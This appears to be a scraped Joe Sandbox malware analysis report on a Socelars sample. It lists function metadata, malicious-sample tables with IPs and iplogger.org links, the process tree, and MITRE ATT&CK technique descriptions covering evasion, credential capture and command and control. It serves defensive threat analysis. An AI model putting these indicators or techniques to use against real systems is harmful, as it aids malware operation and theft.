Instruction Fuzzy Hash: BD11063A3046006FDB2172756C85D6B2399DBD23787252226F52CB23E1EE628C059310

Uniqueness

Uniqueness Score: -1.00%

Function 00E8E808 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00E804DE,00E8E9A0,?,?,00E76649,00000000,00000000,00E34B17,00000008), ref: 00E8E80D
_free.LIBCMT ref: 00E8E86A
_free.LIBCMT ref: 00E8E8A0
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00E804DE,00E8E9A0,?,?,00E76649,00000000,00000000,00E34B17,00000008), ref: 00E8E8AB

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6f5762789178a09097960936ac80df78f0f648a32426fab8cd666298b2ca3f7d
Instruction ID: 0b7709cddebda3cda9669e5beb3e8cbfc98ddfa94acfcf396a128e0e33f84578
Opcode Fuzzy Hash: 6f5762789178a09097960936ac80df78f0f648a32426fab8cd666298b2ca3f7d
Instruction Fuzzy Hash: 051108762106006FDB25B3796C95D6F2799EBD23757292236F52CB23E1DF218C058310

Uniqueness

Uniqueness Score: -1.00%

Function 00DA04E0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 303COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA05EC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA063A

Strings

recovered %d pages from %s, xrefs: 00DA07E7

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: recovered %d pages from %s
API String ID: 885266447-1623757624
Opcode ID: 86822f90da33c4e4b8d766cd847266cfcf7fdac825141abeee59b48796221436
Instruction ID: e7b368b8a82e6925f6e14ddc71ca2e13771ad59754009ae6651cc4cfc8c32488
Opcode Fuzzy Hash: 86822f90da33c4e4b8d766cd847266cfcf7fdac825141abeee59b48796221436
Instruction Fuzzy Hash: 4AB18A75E002269FDF25CFA8C980AAEBBB1FF49314F184129E955A7341E730BD558BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E95208 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00E94DA3: GetOEMCP.KERNEL32(00000000,00E95014,00000000,00E851B5,?,?,00E851B5,00000040,00000000), ref: 00E94DCE

IsValidCodePage.KERNEL32(-00000030,00000000,0350A083,00000040,?,?,00E9505B,00000040,00000000,00000000,?,00000040), ref: 00E95266
GetCPInfo.KERNEL32(00000000,[P,?,?,00E9505B,00000040,00000000,00000000,?,00000040,?,?,?,?,00E851B5,00000040), ref: 00E952A8

Strings

[P, xrefs: 00E952A3, 00E952A6

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: [P
API String ID: 546120528-920644798
Opcode ID: 9058bd1b853ec34dc24c1efee2a3dc89783d14d257f059c7153bf2306aff5a2b
Instruction ID: 4a95e0581075f9953f789caad6698f1d7fe17c58946faeb1a7ddddf635b2dfd6
Opcode Fuzzy Hash: 9058bd1b853ec34dc24c1efee2a3dc89783d14d257f059c7153bf2306aff5a2b
Instruction Fuzzy Hash: 09512372900B459FDF22CF75C8506FABBF5EF51304F14646ED096AB2A2E3B49946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E27C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 00E2B490: _Max_value.LIBCPMTD ref: 00E2B4C6
Part of subcall function 00E2B490: _Min_value.LIBCPMTD ref: 00E2B4EC

_Min_value.LIBCPMTD ref: 00E27D32
allocator.LIBCONCRTD ref: 00E27D49

Part of subcall function 00E29CB0: _Allocate.LIBCONCRTD ref: 00E29CC4

Strings

8Y, xrefs: 00E27CBD, 00E27D0B, 00E27D16

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Min_value$AllocateMax_valueallocator
String ID: 8Y
API String ID: 1398198560-2504371881
Opcode ID: 865621ea5de2ec83c4a83363a0d02d4f58f69d01df6b93f897181d38a6845ab2
Instruction ID: 0401e57bcd2b637b9d0e235b2b37da6b17ede067ff743c3584aa9829f1121189
Opcode Fuzzy Hash: 865621ea5de2ec83c4a83363a0d02d4f58f69d01df6b93f897181d38a6845ab2
Instruction Fuzzy Hash: 574109B5E042199FCB04DFA8E8919EEBBF6BF48300F145569E405B7342E731AA41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D91190 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_Smanip.LIBCPMTD ref: 00D911F7

Strings

User-Agent, xrefs: 00D911CB
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36, xrefs: 00D911C6

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Smanip
String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36$User-Agent
API String ID: 2140389272-3885995274
Opcode ID: 7a288c027b53e4c801525be1190af1af732c7573f0f3a39a99637becbbb19dca
Instruction ID: ba18b2ab4fa6ba7e54ed121265de869dd4b2381536cb0358fa51aafef4a3b270
Opcode Fuzzy Hash: 7a288c027b53e4c801525be1190af1af732c7573f0f3a39a99637becbbb19dca
Instruction Fuzzy Hash: CA1191B1955348ABCB10DBD4EC42FEAB7B8EB54B14F009269F415B72C1EBB46608CB51

Uniqueness

Uniqueness Score: -1.00%

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
148.251.234.83	BjEwXjK71p.exe	Get hash	malicious	Browse	iplogger.org/1dnc57
	WfBayGk51Z.exe	Get hash	malicious	Browse	iplogger.org/1dnc57
	LZetStOCHC.exe	Get hash	malicious	Browse	iplogger.org/1imy57
	3sxV0WWpKs.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	win-setup-i864.exe	Get hash	malicious	Browse	iplogger.org/1dnc57
	csrss.exe	Get hash	malicious	Browse	iplogger.org/1UTbu7.torrent
	IlxS74vUsa.exe	Get hash	malicious	Browse	iplogger.org/1kB597
	hx7ci7Mmrv.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	nj4Cej2IIW.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	3JtJWs7T6b.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	3JtJWs7T6b.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	6DNTEUx66h.exe	Get hash	malicious	Browse	iplogger.org/1kB597
	lxLsGA9J7t.exe	Get hash	malicious	Browse	iplogger.org/1kB597
	D4Tw1UQy8c.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	1r27MukAPc.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	fhk1rVWS22.exe	Get hash	malicious	Browse	iplogger.org/1szwr7
	M1pOSw9W3L.exe	Get hash	malicious	Browse	iplogger.org/1YKyj7
	rr6IFCxkOO.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	2N9a9kQBFI.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	ZMeGwXn01C.exe	Get hash	malicious	Browse	iplogger.org/1asSq7

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	ohAxRsYhOj.dll	Get hash	malicious	Browse	66.42.57.149
	BjEwXjK71p.exe	Get hash	malicious	Browse	149.28.253.196
	LbGqgnO8iD.exe	Get hash	malicious	Browse	149.28.253.196
	vbkwk.dll	Get hash	malicious	Browse	66.42.57.149
	5E97029C1DF108D9C5AF46AEF43FE6D0B3E477B1A2B1B.exe	Get hash	malicious	Browse	45.63.58.60
	e6wKbCfPSE	Get hash	malicious	Browse	45.32.242.12
	WfBayGk51Z.exe	Get hash	malicious	Browse	149.28.253.196
	087ACCFE67E00CDEEFBDEDD44E22DB63CE50BFBF3187B.exe	Get hash	malicious	Browse	149.28.253.196
	#Ud835#Ude3f#Ud835#Ude4a#Ud835#Ude3e-TaAyryp9Cf2.vbs	Get hash	malicious	Browse	149.248.55.205
	LZetStOCHC.exe	Get hash	malicious	Browse	149.28.253.196
	DOC-05022022.xlsm	Get hash	malicious	Browse	66.42.57.149
	5hywwAvgU.dll	Get hash	malicious	Browse	66.42.57.149
	ckIJzkWiNY.dll	Get hash	malicious	Browse	66.42.57.149
	Vkhb4LcZT8.dll	Get hash	malicious	Browse	66.42.57.149
	RNd2Tc4PzO.dll	Get hash	malicious	Browse	66.42.57.149
	huO7nY38WT.dll	Get hash	malicious	Browse	66.42.57.149
	gWrREghp8i.dll	Get hash	malicious	Browse	66.42.57.149
	Vkhb4LcZT8.dll	Get hash	malicious	Browse	66.42.57.149
	FDy3I8Ub2K.dll	Get hash	malicious	Browse	66.42.57.149
	6TwZ0baYfq.dll	Get hash	malicious	Browse	66.42.57.149
HETZNER-ASDE	ohAxRsYhOj.dll	Get hash	malicious	Browse	78.47.204.80
	r1gnvYRnsz.exe	Get hash	malicious	Browse	144.76.136.153
	Swift mesaj#U0131 4.02.2022.exe	Get hash	malicious	Browse	188.40.83.211
	BjEwXjK71p.exe	Get hash	malicious	Browse	148.251.234.83
	Balance payment.doc	Get hash	malicious	Browse	94.130.132.238
	TNT Shipping Documents PDF.exe	Get hash	malicious	Browse	144.76.136.153
	s83VMAOviq.exe	Get hash	malicious	Browse	148.251.234.83
	LbGqgnO8iD.exe	Get hash	malicious	Browse	148.251.234.83
	BS-5001-C21-RFQ.doc	Get hash	malicious	Browse	94.130.132.238
	vbkwk.dll	Get hash	malicious	Browse	78.47.204.80
	2S8msvSWxQ.exe	Get hash	malicious	Browse	148.251.234.83
	Advised Swift mesaj#U0131.exe	Get hash	malicious	Browse	188.40.83.211
	eiUJ75uWf1.exe	Get hash	malicious	Browse	144.76.136.153
	b3astmode.arm	Get hash	malicious	Browse	95.217.66.145
	2F3CF6F156CE19666BD422299AE5A2055BC1F93DC1ED7.exe	Get hash	malicious	Browse	148.251.234.83
	1ajRO9jLPV.exe	Get hash	malicious	Browse	148.251.234.83
	BANK SLIP.exe	Get hash	malicious	Browse	144.76.136.153
	WfBayGk51Z.exe	Get hash	malicious	Browse	148.251.234.83
	087ACCFE67E00CDEEFBDEDD44E22DB63CE50BFBF3187B.exe	Get hash	malicious	Browse	148.251.234.83
	A4F528EBE4A9D85B8B0E91625ACAAD6428B00AE54A2C7.exe	Get hash	malicious	Browse	136.243.111.71

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	BjEwXjK71p.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	NKCWlDkuvp.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	DHL Shipment on Hold Notice Attached 07-FEB-2022.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Snrkelen2.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	nyVg79UTnr.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	WfBayGk51Z.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	y68UmVU6mM.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	DHL Shipping Docx_Ticari Fatura.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	#Ud835#Ude3f#Ud835#Ude4a#Ud835#Ude3e-TaAyryp9Cf2.vbs	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	KC9YFSn61O.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	e4U899904R.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	LZetStOCHC.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Comprobantedepago.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Firefox.js	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Firefox.js	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	8w7b3HbuA3.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Order Confirmation.088373637.PDF.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	LM-586487083.xlsb	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	#U00d6deme Onay Ekran G#U00f6r#U00fcnt#U00fcleri.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196
	Payment_Confirmation_Screenshots.exe	Get hash	malicious	Browse	148.251.234.83 149.28.253.196

Target ID:	1
Start time:	13:26:46
Start date:	07/02/2022
Path:	C:\Users\user\Desktop\8A3kk3sc5r.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8A3kk3sc5r.exe"
Imagebase:	0xd90000
File size:	1501184 bytes
MD5 hash:	EEDFA32E8A73F543F237B4F9AE575176
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000001.00000000.306336689.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Target ID:	6
Start time:	13:26:52
Start date:	07/02/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1916
Imagebase:	0x240000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8A3kk3sc5r.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Socelars

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8A3kk3sc5r.exe_96d850779c25a1697eb7a6e5793779f04428b93e_e51a470d_19e8227b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1405.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15FA.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD0.tmp.dmp

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Windows Analysis Report
8A3kk3sc5r.exe

Function 00E7921F Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Function 00E8EC2C Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 00E7662F Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Function 00E8E95D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 00DDF560 Relevance: 28.9, Strings: 22, Instructions: 1388
COMMONCrypto

Function 00DB2690 Relevance: 16.9, Strings: 13, Instructions: 686
COMMONCrypto

Function 00DBDCF0 Relevance: 15.4, Strings: 12, Instructions: 412
COMMONCrypto

Function 00DCB0D0 Relevance: 12.9, Strings: 10, Instructions: 356
COMMONCrypto

Function 00DF1170 Relevance: 11.8, Strings: 9, Instructions: 525
COMMONCrypto

Function 00DC5370 Relevance: 10.6, Strings: 8, Instructions: 570
COMMONCrypto

Function 00E94134 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
timeCOMMON

Function 00DD89E0 Relevance: 8.0, Strings: 6, Instructions: 527
COMMONCrypto

Function 00DA1B20 Relevance: 8.0, Strings: 6, Instructions: 491
COMMONCrypto

Function 00DA2380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 389
COMMONCrypto

Function 00DB2ED0 Relevance: 6.6, Strings: 5, Instructions: 392
COMMONCrypto